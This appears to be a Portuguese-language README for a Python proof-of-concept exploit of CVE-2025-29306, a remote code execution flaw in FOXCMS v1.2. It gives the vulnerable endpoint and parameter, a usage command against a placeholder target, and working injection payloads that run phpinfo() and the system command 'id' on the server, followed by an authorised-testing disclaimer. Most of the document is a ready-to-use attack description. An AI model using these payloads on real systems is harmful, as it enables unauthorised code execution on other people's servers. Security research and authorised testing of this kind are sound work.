
PoC em Python para CVE-2025-29306, uma injeção de parâmetro RCE no FOXCMS v1.2. Injeta código PHP através do parâmetro id em /images/index.html para testes de segurança autorizados.
Este repositório contém um PoC baseado em Python para uma vulnerabilidade de Execução Remota de Código (RCE) que afeta o FOXCMS v1.2, um sistema de gerenciamento de conteúdo chinês de código aberto.
CVE-ID: CVE-2025-29306
Afeta: FOXCMS v1.2
Tipo: Injeção de Parâmetro de Serviço → Execução de Código
FOXCMS sofre de um mecanismo de análise de parâmetros inseguro no parâmetro id no endpoint /images/index.html. Isso permite a injeção de payload usando expressões ${@print()}, levando à execução de código PHP.
requestspip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
# 🔐 Aviso Legal
Este código é apenas para fins educacionais e testes de segurança autorizados.
NÃO o utilize em sistemas que você não possui ou não tem permissão para testar.
Autor
Inok009